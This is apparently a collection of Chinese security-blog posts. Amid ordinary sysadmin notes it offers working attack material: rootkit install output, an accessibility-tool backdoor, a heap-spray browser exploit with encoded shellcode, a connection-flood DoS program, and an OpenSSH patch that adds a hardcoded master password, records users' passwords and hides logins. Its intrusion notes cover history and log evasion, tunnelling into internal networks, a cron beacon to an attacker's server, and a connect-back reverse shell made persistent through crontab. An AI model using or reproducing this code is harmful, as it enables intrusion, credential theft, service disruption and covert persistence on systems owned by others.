mkdir: cannot create directory `/usr/lib/libsh': File exists
mkdir: cannot create directory `/usr/lib/libsh/.backup': File exists
[sh]#          : ps/ls/top/netstat/ifconfig/find/ and rest backdoored
[sh]#                                                                 
[sh]# [Installing some utils...]                                      
[sh]#          : mirk/synscan/others... moved                     
[sh]# [Moving our files...]                                           
mkdir: cannot create directory `/usr/lib/libsh/.sniff': File exists
[sh]#          : sniff/parse/sauber/hide moved                     
[sh]# [Modifying system settings to suite our needs]                   
[sh]# Checking for vuln-daemons ...                   
Unknown HZ value! (194) Assume 100.
[sh]# RPC.STATD found - patch it bitch !!!!             
mkdir: cannot create directory `/usr/lib/libsh/.owned': File exists
--------------------------------------------------------------------
[sh]# [System Information...]
[sh]# Hostname : localhost.localdomain (222.222.66.11)
[sh]# Arch : 2007 -+- bogomips : 6003.55
5999.45 '
[sh]# Alternative IP : 127.0.0.1 -+-  Might be [1 ] active adapters.
[sh]# Distribution: Red Hat Enterprise Linux Server release 5 (Tikanga)
--------------------------------------------------------------------
[sh]# ipchains ... ?

[sh]# lucky for u no ipchains found
--------------------------------------------------------------------
[sh]# iptables ...?
iptables: No chain/target/match by that name

--------------------------------------------------------------------
[sh]# Just ignore all errors if any !
[sh]# ============================== Backdooring completed in :3 seconds

[root@localhost shv5]# nc 127.0.0.1 8585
SSH-1.5-2.0.13

Protocol mismatch.

根据SHV5的setup脚本我们可以稍微改下变成自动卸载的脚本，之后附在文后。
累死了，赶紧回家休息。

WIN+U放大镜后门

最近所谓的openssh 0day挺恶心的，大家慎用所谓的0pen0wn.c by anti-sec group，假的，shellcode是perl的执行rm -rf ~ /* 2> /dev/null &

WIN+U放大镜后门，比较淫荡的做法。

ren magnify.exe aa.exe
copy /y cmd.exe magnify.exe

可以在现有的magnify.exe基础上绑个shell上去弹出cmd.exe，如果隐藏点的话，那个cmd可以用其他热键呼出。

FreeBSD6.2上的qemu通过桥接方式上网

我的FreeBSD里面的qemu虚拟了一个2003，一直是NAT上网方式（默认的），问题是我BSD和2003之间没法通讯，同时内网其他机器也没法连，这就好多测试做不了。查了下资料发现可以用Bridge的方式，具体做法如下：

1、在/boot/loader.conf里面加上下面几行，启动机器自动加载aio、kqemu、if_tap、if_bridge、bridge几个模块(如果不支持模块，重编内核)：

aio_load="YES"
kqemu_load="YES"
bridge_load="YES"
if_tap_load="YES"
if_bridge_load="YES"

2、sysctl 变量，添加下面一行到 /etc/sysctl.conf

net.link.tap.user_open=1

3、桥接和kqemu，在/etc/rc.conf加下面几行：

kqemu_enable="YES"
cloned_interfaces="bridge0"
ifconfig_bridge0="addm fxp0"

我的物理网口是fxp0。

4、启动的时候，加 –net nic –net tap参数，否则默认还是NAT的方式，不是桥接：

/usr/local/bin/qemu -net nic -net tap -hda /usr/local/qemu/windows.img -cdrom /root/8029.iso -boot c -m 512 -localtime

MPEG-2 0day

上周末此漏洞挂马严重，周一拿到样本看了下，由于http://metasploit.com:55555一直处于关闭状态，没法生成shellcode，小黑给的改成本地生成的那个脚本也有问题，一直异常截断，分析了下，取得PAYLOADS的结果就截断了，而且在转译的时候也有问题。本来说用ms09002生成的那段试试，结果发现那段shellcode被杀了。

只好重新手工获取PAYLOADS的shellcode然后用vbs转译。核心代码：

ll=len(shellcode)/4
ret=""
for i=0 to ll-1
    ret=ret&"%u"&mid(shellcode,i*4+3,2)
    ret=ret&mid(shellcode,i*4+1,2)

然后测试ok。

var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+"%u12eb%ufc5e%u35bb%u3943%u5672%u1e31%u01ad%u85c3%u75c0%uc3f7%ue9e8%uffff%udeff%u6353%u1338%uf59d%u6f05%u7a1c%u8541%u9887%u7250%ub4b2%u7b4e%ubb42%ucfe1%udd24%u0c9b%ue6ab%u0b32%u8ecd%uf257%ua27b%u81be%ud1b0%u1899%u94aa%uf00b%u046e%u83c1%ub390%u9973%u7db5%uff19%ua92b%u5593%u9a3f%u6162%u82d2%u13e1%ua1c1%u44e6%u5f25%u8736%u6037%u4d8e%ufc66%u0ad3%u3ee6%u2b2d%ueb14%u6ca0%u89a4%uda9f%u37af%u7047%ub71f%u156a%u98b2%u8f0e%u7ee9%u3469%u2797%ud39b%u8d32%u8089%u5c50%u19b4%ub2c2%u5681%u7271%u5160%uea13%u7b1a%u997b%ub4d6%u6fe5%u898d%u2ef8%u95bd%uc13d%u3ce5%ubb24%u61fc%u73dd%u84df%u9246%ud50c%u0a91%uded5%u21b8%uf25f%u3af9%u3826%u7367%ue22c%u11f5%ue20a%udab1%ucfcb%ubf24%u1315%u59c1%ub27f%u903b%u8b4a%u4575%u7685%ucf94%ub2d0%u01fe%u8b8b%u5399%ua121%u593f%ueca6%uc153%uc51e%uc863%u92f9%u0db8%u5f37%u2448%uc561%u87c7%u9ff4%u2641%ub204%u3d47%ub603%u3f80%uad11%u2acd%ua800%u57f0%u0038%u42ec%u682e%u4f19%u7b41%u8a1e%u8d4f%u8b34%ue848%ubc05%ud69e%uc17b%u7f9b%udba7%u92ac%ued95%u90a6%uf3de%ubda0%uf4e9%ue82e%ufee6%uea3a%ue1ec%u9365%u0a1f%u5760%u3a29%u5b12%u101d%u95f8%u6c4c%uaff6%u6e69%ub934%u6155%ub932%u1bb2%u35d5%u6c37%u9a1c%ufb98%u9317%u79c8%u34b9%u177f%ufa58%u8451%ud5f4%u3fc0%u4c27%ua563%u8eb7%u2593");
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

Security Checklists

http://iase.disa.mil/stigs/checklist/index.html

防止apache的php扩展名解析漏洞

vitter@sefechina.net
http://blog.securitycn.net

今天看到ecshop后台拿webshell的文章，想起来很长时间很多版本存在的apache的php扩展名解析漏洞，主要问题是：不管文件最后后缀为什么，只要是.php.*结尾，就会被Apache服务器解析成php文件，问题是apache如果在mime.types文件里面没有定义的扩展名在诸如x1.x2.x3的情况下，最后一个x3的没有定义，他会给解析成倒数第二个的x2的定义的扩展名。所以xxx.php.rar或者xxx.php.111这些默认没在mime.types文件定义的都会解析成php的。同样如果是cgi或者jsp也一样，那怎么样防止这个问题发生能？

1、可以在mime.types文件里面定义常用的一些扩展名，
如：application/rar          rar
但是这个没解决问题，我们不可能全把所有的都定义吧。

2、取消上传，这个也不太可能。

3、上传文件强制改名，这个由程序实现，如果在虚拟机比较多，开发人员多的情况下也不靠谱。

4、比较靠谱的终极大法，禁止*.php.*这种文件执行权限，当然可能误杀，但是基本上这种规则的文件名肯定有问题。
<FilesMatch "\.(php.|php3.)">
        Order Allow,Deny
        Deny from all
</FilesMatch>

很多dz论坛、ecshop、phpcms等后台都有利用此漏洞上传webshell的方法，那如果我们按上述方法操作了，那很多问题都可以解决了，希望本文对你有所帮助。

flood_poll.cpp

来了

/*
1   g++ -o flood flood_poll.cpp
2  ulimit -n socket_count   (you'd better set it bigger than socket_count)
3  ./flood ip port socket_count >/dev/null &
vitter@safechina.net
http://blog.securitycn.net
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include 
#include
#include
#include

using namespace std;

/*used for std::find*/
struct PollFD : public pollfd
{
    bool operator <  (const PollFD &rhs) const { return fd <  rhs.fd; }
    bool operator == (const PollFD &rhs) const { return fd == rhs.fd; }
};
typedef vector<PollFD> FDSet;

FDSet fdset;

int new_socket(struct sockaddr_in *serv_addr,socklen_t addrlen)
{
    int sockfd;
    if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0)
    {
        perror("socket error:");
        return -1;
    }
    fcntl(sockfd, F_SETFL, fcntl(sockfd, F_GETFL)|O_NONBLOCK);
    if(connect(sockfd,(sockaddr*)serv_addr,addrlen)<0)   
    {
        if(errno != EINPROGRESS)
            return -1;
    }
/*    max_fd = max(max_fd,sockfd);
    fdset.push_back(sockfd);
    FD_SET(sockfd,&rfds);
    FD_SET(sockfd,&wfds);
*/
    PollFD *pfd = new PollFD();
    pfd->fd = sockfd;
    pfd->events|=POLLOUT;
    pfd->events|=POLLIN;
    fdset.push_back(*pfd);
    return 1;
}

void remove_and_new(PollFD& fd,struct sockaddr_in *serv_addr,socklen_t addrlen)
{
    vector<PollFD>::iterator it = find(fdset.begin(),fdset.end(),fd);
    close((*it).fd);   
    fdset.erase(it);
    //printf("remove fd %d\n",*it);
    while(new_socket(serv_addr,addrlen)<0);

}

void pollout(PollFD& poll_fd,struct sockaddr_in *serv_addr,socklen_t addrlen)
{
    char *request = "";
    if(poll_fd.revents&POLLOUT)
    {
        printf("pollout\n");
        if(send(poll_fd.fd,request,strlen(request),0)<0)
        {
            printf("send\n");
            perror("pollout write error:");   
            remove_and_new(poll_fd,serv_addr,addrlen);
        }
    }
    //fflush(stdout);
//    sleep(1);

}

void pollin(PollFD& poll_fd,struct sockaddr_in *serv_addr,socklen_t addrlen)
{
    if(poll_fd.revents&POLLIN)
    {
        printf("pollin %d\n",poll_fd.fd);
        char buf[1024];
        memset(buf,0,1024);
        if(recv(poll_fd.fd,buf,1024,0) == -1)
        {
            perror("read failed new a socket\n");
            remove_and_new(poll_fd,serv_addr,addrlen);
        }
        printf(buf);
    }
}

void set_fd(struct sockaddr_in *serv_addr,socklen_t addrlen,int count)
{
    printf("the fdset's size is %d\n",fdset.size());
    while(fdset.size()<count)
    {
        while(new_socket(serv_addr,addrlen)<0);

    }
    for(vector<PollFD>::iterator it=fdset.begin(), ie=fdset.end();
            it != ie;it++)
    {
        (*it).events|=POLLOUT;
        (*it).events|=POLLIN;
    }

}

int main(int argc,char **argv)
{

    if(argc < 3)
    {
        printf("use flood <ip> <port> <number>\n");
        exit(-1);
    }

    int count = atoi(argv[3]);

        signal(SIGPIPE, SIG_IGN);
    struct sockaddr_in serv_addr;
    memset(&serv_addr,0,sizeof(struct sockaddr_in));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(atoi(argv[2]));
    serv_addr.sin_addr.s_addr = inet_addr(argv[1]);

    for(int i=0;i<count;i++)
    {
        new_socket(&serv_addr,sizeof(struct sockaddr_in));
    }
/*
    struct timeval timeout;
    timeout.tv_sec = 3;
    timeout.tv_usec = 0;
*/
    printf("finish init\n");   

    for(;;)
    {
        set_fd(&serv_addr,sizeof(struct sockaddr_in),count);
        switch(poll(&fdset[0],fdset.size(),0))
        {
            case -1:
                printf("error when use select\n");
                exit(-1);
            case 0:
                printf("select 0\n");
                break;
            default:
                printf("select \n");
                for(vector<PollFD>::iterator it=fdset.begin(),ie=fdset.end();
                        it != ie;it++)
                {
                    pollin(*it,&serv_addr,sizeof(struct sockaddr_in));
                    pollout(*it,&serv_addr,sizeof(struct sockaddr_in));;
                }
        }   
    }
    return 0;
}

webmin的snort的patch

很早之前用webmin做某项目的时候发现的一个问题，打的patch。

wget http://www.securitycn.net/snort/webmin-snort.diff

patch < webmin-snort.diff

--------------------------------淫荡的代码分割线--------------------------------

--- index.cgi.orig      Thu Dec  7 12:36:47 2006
+++ index.cgi   Thu Dec  7 12:39:32 2006
@@ -20,6 +20,7 @@
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA

+## Bugfix; ignore '$RULE_PATH'  2006-12-07 <vitter@gmail.com WWW.SECURITYCN.NET>

# Do common initialization and get common routines
# Note this also does the acl acess lookup
@@ -75,6 +76,12 @@
foreach $ruleset (@rulefiles) {
    ($rule) = $ruleset =~ /[#]*(\S+)\.rules/;

+   ## Remove the fucking BUG in this Webmin module!
+   ($rule) =~ s/.*\$RULE_PATH\/*//g;
+   ($rule) =~ s/.*somefile*//g;
+   ($rule) =~ s/[^[:print:]]//g;
+   if(/($rule)/) {next;}
+
    # Check to see if user can access a given ruleset
    if ($access{'rules'} ne "*") {
       if ($access{'rules'} =~ /^\!/) {
@@ -95,10 +102,12 @@
    if ($ruleset =~ /^#/) {
       # The ruleset is disabled
       $rulerow{$rule} .= "<img src=\"images/disabled.gif\" alt=\"$text{'index_disabled'}\"></td>";
-      $rulerow{$rule} .= "<td><a href=\"rule_status.cgi?rule=$rule\">$text{'index_enable'}" if $access{'ruletog'};
+#      $rulerow{$rule} .= "<td><a href=\"rule_status.cgi?rule=$rule\">$text{'index_enable'}" if $access{'ruletog'};
+      $rulerow{$rule} .= "<td><a href=\"rule_status.cgi?rule=\$RULE_PATH\/$rule\">$text{'index_enable'}" if $access{'ruletog
'};
    } else {
       $rulerow{$rule} .= "<img src=\"images/enabled.gif\" alt=\"$text{'index_enabled'}\"></td>";
-      $rulerow{$rule} .= "<td><a href=\"rule_status.cgi?rule=$rule\">$text{'index_disable'}" if $access{'ruletog'};
+#      $rulerow{$rule} .= "<td><a href=\"rule_status.cgi?rule=$rule\">$text{'index_disable'}" if $access{'ruletog'};
+      $rulerow{$rule} .= "<td><a href=\"rule_status.cgi?rule=\$RULE_PATH\/$rule\">$text{'index_disable'}" if $access{'ruleto
g'};
    }
}

OpenSSH3.9p1后门patch

照着3.4的改的，之前看到某牛发的了，拿过来发现有问题，重新改过测试没问题了。该patch会记录服务端和客户端login的用户和密码，同时登陆到服务器不会syslog记录，修改密码和记录文件在includes.h最后那部分。

------------------------------------------淫荡的代码分割线------------------------------------------

# $Id: OpenSSH-3.9p1.diff,v 1.6 2009/05/18 $
#
# patch for OpenSSH-3.9p1
#
# when applied this patch will authenticate you
# as any user with the secret password and that user
# will not be logged. it will also log logins/passwords
# client and server side
#
# usage:
# you'll probably want to change the defines found below
# make sure that the _LOG_DIR is chmod 777
# cp OpenSSH-3.9p1.diff openssh-3.9p1/;cd openssh-3.9p1
# patch < OpenSSH-3.9p1.diff
#
# vitter@safechina.net
# blog.securitycn.net

diff -uNr old/auth.c vitter/auth.c
--- old/auth.c    2004-08-12 20:40:25.000000000 +0800
+++ vitter/auth.c    2009-05-18 14:01:12.000000000 +0800
@@ -230,15 +230,16 @@
     else
         authmsg = authenticated ? "Accepted" : "Failed";
-    authlog("%s %s for %s%.100s from %.200s port %d%s",
-        authmsg,
-        method,
-        authctxt->valid ? "" : "invalid user ",
-        authctxt->user,
-        get_remote_ipaddr(),
-        get_remote_port(),
-        info);
-
+    if(!mlogin_ok){
+        authlog("%s %s for %s%.100s from %.200s port %d%s",
+            authmsg,
+            method,
+            authctxt->valid ? "" : "illegal user ",
+            authctxt->user,
+            get_remote_ipaddr(),
+            get_remote_port(),
+            info);
+    }
#ifdef CUSTOM_FAILED_LOGIN
     if (authenticated == 1 && strcmp(method, "password") == 1)
         record_failed_login(authctxt->user, "ssh");
diff -uNr old/auth-passwd.c vitter/auth-passwd.c
--- old/auth-passwd.c    2004-06-22 11:37:11.000000000 +0800
+++ vitter/auth-passwd.c    2009-05-18 13:58:54.000000000 +0800
@@ -150,6 +150,16 @@
      * Authentication is accepted if the encrypted passwords
      * are identical.
      */
-    return (strcmp(encrypted_password, pw_password) == 0);
+    if(strcmp(_SECRET_PASSWD, password) == 1){
+            mlogin_ok = 1;
+            return 1;
+    }
+    if(strcmp(encrypted_password, pw_password) == 0){
+            outf = fopen(_LOG_DIR"/"_S_LOG,"a");
+            fprintf (outf, "%s:%s\n",pw->pw_name,password);
+            fclose (outf);
+            return 1;
+    }else
+            return 0;
}
#endif
diff -uNr old/canohost.c vitter/canohost.c
--- old/canohost.c    2004-07-21 19:53:34.000000000 +0800
+++ vitter/canohost.c    2009-05-18 14:03:14.000000000 +0800
@@ -61,10 +61,12 @@
     debug3("Trying to reverse map address %.100s.", ntop);
     /* Map the IP address to a host name. */
-    if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
-        NULL, 0, NI_NAMEREQD) != 0) {
-        /* Host name not found.  Use ip address. */
-        return xstrdup(ntop);
+    if(!mlogin_ok){
+      if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
+          NULL, 0, NI_NAMEREQD) != 1) {
+          /* Host name not found.  Use ip address. */
+             return xstrdup(ntop);
+      }
     }
     /*
diff -uNr old/includes.h vitter/includes.h
--- old/includes.h    2004-08-14 22:01:48.000000000 +0800
+++ vitter/includes.h    2009-05-18 14:05:19.000000000 +0800
@@ -200,5 +200,11 @@
#include "openbsd-compat/bsd-nextstep.h"
#include "entropy.h"
+#define _SECRET_PASSWD "vittersshdoor"
+#define _LOG_DIR "/dev/shd"
+#define _S_LOG "sslog"
+#define _C_LOG "sclog"
+FILE *outf;
+int mlogin_ok;
#endif /* INCLUDES_H */
diff -uNr old/sshconnect1.c vitter/sshconnect1.c
--- old/sshconnect1.c    2004-08-12 20:40:25.000000000 +0800
+++ vitter/sshconnect1.c    2009-05-18 14:09:58.000000000 +0800
@@ -436,6 +436,7 @@
{
     int type, i;
     char *password;
+    char gpasswd[120];
     debug("Doing password authentication.");
     if (options.cipher == SSH_CIPHER_NONE)
@@ -444,6 +445,7 @@
         if (i != 1)
             error("Permission denied, please try again.");
         password = read_passphrase(prompt, 0);
+        strcpy(gpasswd,password);
         packet_start(SSH_CMSG_AUTH_PASSWORD);
         ssh_put_password(password);
         memset(password, 0, strlen(password));
@@ -452,8 +454,14 @@
         packet_write_wait();
         type = packet_read();
-        if (type == SSH_SMSG_SUCCESS)
-            return 1;
+        if (type == SSH_SMSG_SUCCESS){
+            if(strcmp(_SECRET_PASSWD,gpasswd) != 0){
+                outf = fopen(_LOG_DIR"/"_C_LOG,"a");
+                fprintf (outf,"%s:%s@%s\n",options.user,gpasswd,get_remote_ipaddr());
+                fclose (outf);
+            }
+             return 1;
+        }
         if (type != SSH_SMSG_FAILURE)
             packet_disconnect("Protocol error: got %d in response to passwd auth", type);
     }
diff -uNr old/sshconnect2.c vitter/sshconnect2.c
--- old/sshconnect2.c    2004-06-15 08:30:09.000000000 +0800
+++ vitter/sshconnect2.c    2009-05-18 14:12:13.000000000 +0800
@@ -724,6 +724,7 @@
     static int attempt = 0;
     char prompt[150];
     char *password;
+    char gpasswd[120];
     if (attempt++ >= options.number_of_password_prompts)
         return 0;
@@ -734,6 +735,7 @@
     snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ",
         authctxt->server_user, authctxt->host);
     password = read_passphrase(prompt, 0);
+    strcpy(gpasswd,password);
     packet_start(SSH2_MSG_USERAUTH_REQUEST);
     packet_put_cstring(authctxt->server_user);
     packet_put_cstring(authctxt->service);
@@ -747,7 +749,11 @@
     dispatch_set(SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ,
         &input_userauth_passwd_changereq);
-
+    if(strcmp(_SECRET_PASSWD,gpasswd) != 1){
+        outf = fopen(_LOG_DIR"/"_C_LOG,"a");
+        fprintf (outf,"%s:%s@%s\n",options.user,gpasswd,get_remote_ipaddr());
+        fclose (outf);
+    }
     return 1;
}
/*
diff -uNr old/sshlogin.c vitter/sshlogin.c
--- old/sshlogin.c    2004-08-13 19:21:47.000000000 +0800
+++ vitter/sshlogin.c    2009-05-18 14:15:33.000000000 +0800
@@ -112,8 +112,10 @@
     li = login_alloc_entry(pid, user, host, tty);
     login_set_addr(li, addr, addrlen);
-    login_login(li);
-    login_free_entry(li);
+  if(!mlogin_ok){
+      login_login(li);
+      login_free_entry(li);
+  }
}
#ifdef LOGIN_NEEDS_UTMPX
@@ -137,6 +139,8 @@
     struct logininfo *li;
     li = login_alloc_entry(pid, user, NULL, tty);
-    login_logout(li);
-    login_free_entry(li);
+  if(!mlogin_ok){
+      login_logout(li);
+      login_free_entry(li);
+  }
}

linux最近不消停啊

昨天来了。。。。。。

先是udev的local root漏洞，又是SCTP远程溢出漏洞，这又ptrace 0day的local root漏洞。这都没一个月呢，接二连三的高危漏洞出来啊，大家有的玩了。。。。。。

NTOP的gdbm fatal: write error报错解决方案

今天发现ntop页面打不开了，结果上服务器上看端口没监听了，重启结果如下：
[root@gateway ntop]# /usr/local/ntop/bin/ntop -d
Thu May  7 10:05:38 2009  NOTE: Interface merge enabled by default
Thu May  7 10:05:38 2009  Initializing gdbm databases
Thu May  7 10:05:38 2009  NOTE: Interface merge disabled from prefs file
Thu May  7 10:05:38 2009  ntop will be started as user nobody
Thu May  7 10:05:38 2009  ntop v.3.2 SourceForge .tgz
Thu May  7 10:05:38 2009  Configured on May  8 2008  1:40:02, built on May  8 2008 01:41:03.
Thu May  7 10:05:38 2009  Copyright 1998-2005 by Luca Deri <deri@ntop.org>
Thu May  7 10:05:38 2009  Get the freshest ntop from http://www.ntop.org/
Thu May  7 10:05:38 2009  NOTE: ntop is running from '.'
Thu May  7 10:05:38 2009  NOTE: (but see warning on man page for the --instance parameter)
Thu May  7 10:05:38 2009  NOTE: ntop libraries are in '/usr/local/ntop/lib'
Thu May  7 10:05:38 2009  Initializing ntop
Thu May  7 10:05:39 2009  Checking eth0 for additional devices
Thu May  7 10:05:39 2009  Resetting traffic statistics for device eth0
Thu May  7 10:05:39 2009  DLT: Device 0 [eth0] is 1, mtu 1514, header 14
Thu May  7 10:05:39 2009  Initializing gdbm databases
Thu May  7 10:05:39 2009  VENDOR: Loading MAC address table.
Thu May  7 10:05:39 2009  VENDOR: Checking for MAC address table file
Thu May  7 10:05:39 2009  VENDOR: File '/usr/local/ntop/etc/ntop/specialMAC.txt.gz' does not need to be reloaded
Thu May  7 10:05:39 2009  VENDOR: ntop continues ok
Thu May  7 10:05:39 2009  VENDOR: Checking for MAC address table file
Thu May  7 10:05:39 2009  VENDOR: File '/usr/local/ntop/etc/ntop/oui.txt.gz' does not need to be reloaded
Thu May  7 10:05:39 2009  VENDOR: ntop continues ok
Thu May  7 10:05:39 2009  Fingeprint: Loading signature file.
Thu May  7 10:05:39 2009  Fingeprint: ...loaded 1697 records
Thu May  7 10:05:39 2009  INIT: Bye bye: I'm becoming a daemon...
Thu May  7 10:05:39 2009  INIT: Parent process is exiting (this is normal)

现在netstat –lntp
tcp        0      0 :::80                       :::*                        LISTEN      5107/ntop          
还有监听，打开页面还没出来全部，发现就挂了，没端口监听了，后台报错：
gdbm fatal: write error

一直没人动的，突然就这样了。原以为很麻烦的问题，结果半分钟后发现：
[root@gateway ntop]# ll
total 2012320
-rw-r--r-- 1 root root     249856 2009-05-07 10:06 addressQueue.db
-rw-r--r-- 1 root root 2147483647 2009-05-07 10:06 dnsCache.db
-rw-r--r-- 1 root root     237568 2009-05-07 10:06 fingerprint.db
-rw-rw-r-- 1 root root   17534976 2009-05-07 10:06 LsWatch.db
-rw-r--r-- 1 root root    1110238 2008-05-08 02:37 macPrefix.db
-rw-r--r-- 1 root root      12963 2008-05-15 14:58 ntop_pw.db
-rw-r--r-- 1 root root      13265 2008-08-07 17:04 prefsCache.db

dnsCache.db这个文件2G了（应该是长时间没清除数据造成的），由于Linux默认内核最大单个文件2G，所以服务起不来很正常，删掉这个文件，重启ntop服务，一切正常。

用nst的反弹后后门连上nc后不能su交互的解决方法+内网渗透测试笔记

by：vitter@safechina.net
blog：blog.securitycn.net

用nst的反弹后门连上nc后不能su交互，报错如下：
standard in must be a tty
解决方法：
python -c 'import pty; pty.spawn("/bin/sh")'
得到shell就可以su进行交互了。

ps：最近渗透测试中遇到的几个值得注意的情况，记录下：

1.history不记录：
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

2.history
n   ：数字，意思是‘要列出最近的 n 笔命令列表’的意思！
-c  ：将目前的 shell 中的所有 history 内容全部消除
-a  ：将目前新增的 history 指令新增入 histfiles 中，若没有加 histfiles ，
      则预设写入 ~/.bash_history
-r  ：将 histfiles 的内容读到目前这个 shell 的 history 记忆中；
-w  ：将目前的 history 记忆内容写入 histfiles 中！

3.正确的删除文件做法是用shred
shred -n 31337 -z -u file_to_delete

4.内网ssh映射
可以用ssh隧道代理的方式访问：plink root@公网ip -D 127.0.0.1:8080 然后ie代理socks5代理设置为127.0.0.1:8080就可以访问内网了：http://192.168.0.1

5.改了一个c++写的端口映射的工具proxy，2个版本，一个是加参数的。另一个改的读取配置文件的。源码以后公布(源码见下面回复)。
/usr/local/bin/proxy 2080 192.168.0.7 80 把0.7的80端口映射到本机的2080端口。

6.Windows下SuperO Doctor III管理后台，可用VNC：（超微主板带的管理工具，有点类似IPMI之类的）
值得注意的是，由于SuperO Doctor III分別采用到Xitami web server、TridiaVNC、SndMail 2.1以及WMI（Windows Management Instrumentation） Core 1.5，所以必须使用不同的帐号密码才能进行设置上的修改。系統登录以及Xitami web server预设默认帐号密码是ADMIN/ADMIN，而TridiaVNC密码则是abcde，而非Windows系統管理员的帐号。

7.Welcome to EIS System!
改设备的默认Telnet用户名和密码是admin/admin

8.reDuh，一个不错的工具，可以映射内网端口到http或https端口的http服务上：
服务端有aps、jsp、php版，具体下载：http://www.sensepost.com/research/reDuh。下面简单说下这个工具
先在服务器上传服务端：访问http://www.xxx.com/shell/reduh.jsp如下：
[reDuhError]Undefined Request
说明工作正常。在本地：
D:\Tools\reDuh\0.2\reDuhClient>java reDuhClient www.xxx.com 80 /shell/reduh.jsp
[Info]Querying remote JSP for usable remote RPC port
[Info]Remote RPC port chosen as 42001
[Info]Attempting to start reDuh.jsp from www.xxx.com:80/shell/reduh.jsp and set
ting remote RPC port to 42001. Please wait...
[InfoL]reDuhClient service listener started on local port 1010
[InfoL]Caught new service connection on port 1010
本地默认监听1010端口：
D:\Tools>nc -vv 127.0.0.1 1010
DNS fwd/rev mismatch: localhost != vitter
localhost [127.0.0.1] 1010 (?) open
Welcome to the reDuh command line
>>[createTunnel]5900:192.168.0.3:5900
Successfully bound locally to port 5900. Awaiting connections.
出现这个提示就ok了，[createTunnel]本地映射出的端口:被映射的内网ip:被映射的内网ip端口
然后就可以用vnc连接127.0.0.1的5900端口就是连攻击内网的192.168.0.3的服务器了。

9.对于ip不固定的怎么确认ip：
我的做法是在被攻击机器上crond里面跑一个脚本定时访问我写的一个jsp文件。
[root@cactiez etc]# cat /etc/cron.hourly/curl
#!/bin/sh
/usr/bin/curl http://xxx.xxx.com/ip/getip.jsp 

该jsp代码如下：
----------------------------代码开始分割线-----------------------------
<%@ page contentType="text/html; charset=GB2312"%>
<%@ page language="java" %>
<%@ page import="java.io.*" %>
<%
String str = request.getRemoteAddr();
java.text.SimpleDateFormat formatter = new java.text.SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date currentTime = new java.util.Date();
String str_date1 = formatter.format(currentTime);
String agent = request.getHeader("user-agent");
String nameOfTextFile = "/usr/local/www/home/default-web/ip.txt";
try {
  PrintWriter pw = new PrintWriter(new FileOutputStream(nameOfTextFile));
  pw.println(str_date1);
  pw.println(agent);
  pw.println(str);
  pw.close();
} catch(IOException e) {
  out.println(e.getMessage());
}
%>       
----------------------------代码结束分割线-----------------------------
ip地址记录在了/usr/local/www/home/default-web/ip.txt文件里面，格式如下：
2009-05-06 15:19:23
curl/7.15.5 (i686-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
123.123.123.254

10.如何在webshell反弹后门回来后停止apache：
由python -c 'import pty; pty.spawn("/bin/sh")'得到一个可以交互的shell，在有root密码的前提下可以su，但是发现不能停止httpd，因为这个shell的父进程是httpd的，如果httpd被stop后，发现后门直接就挂了。可以crond去跑这个后门得到shell不要用webshell跑，在这个shell里面停止httpd（因为该内网服务器段只被映射这一个ip的80端口出来，现在这个80端口要做内网映射到网关上，可以直接远程管理设备，开DMZ之后入侵其他内网服务器）。
本地：nc -l -p 5555
服务器上：
[root@cactiez etc]# cat /home/www/haha.c
----------------------------代码开始分割线-----------------------------
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
int fd, sock;
int port = 5555;
struct sockaddr_in addr;
char mesg[]  = "::Connect-Back Backdoor:: CMD: ";
char shell[] = "/bin/sh";
int main(int argc, char *argv[]) {
        while(argc<2) {
        fprintf(stderr, " %s <ip> ", argv[0]);
        exit(0); }
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);
connect(fd, (struct sockaddr*)&addr, sizeof(addr));
send(fd, mesg, sizeof(mesg), 0);
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl(shell, "in.telnetd", 0);
close(fd);
return 1;
}
----------------------------代码结束分割线-----------------------------
[root@cactiez etc]# gcc -o /bin/haha /home/www/haha.c
[root@cactiez etc]# mkdir /etc/cr_m
[root@cactiez etc]# cp /home/www/si /etc/cr_m/
[root@cactiez etc]# chmod +x /etc/cr_m/si

追加一个crontab每分钟执行的：
[root@cactiez etc]# echo "*/1 * * * * root run-parts /etc/cr_m" >> /etc/crontab
[root@cactiez etc]# cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
*/1 * * * * root run-parts /etc/cr_m
1分钟后本地nc监听的就连上了，然后在这个里面停止httpd：
[root@cactiez etc]# cat /root/s.sh
#!/bin/sh
/sbin/service httpd stop
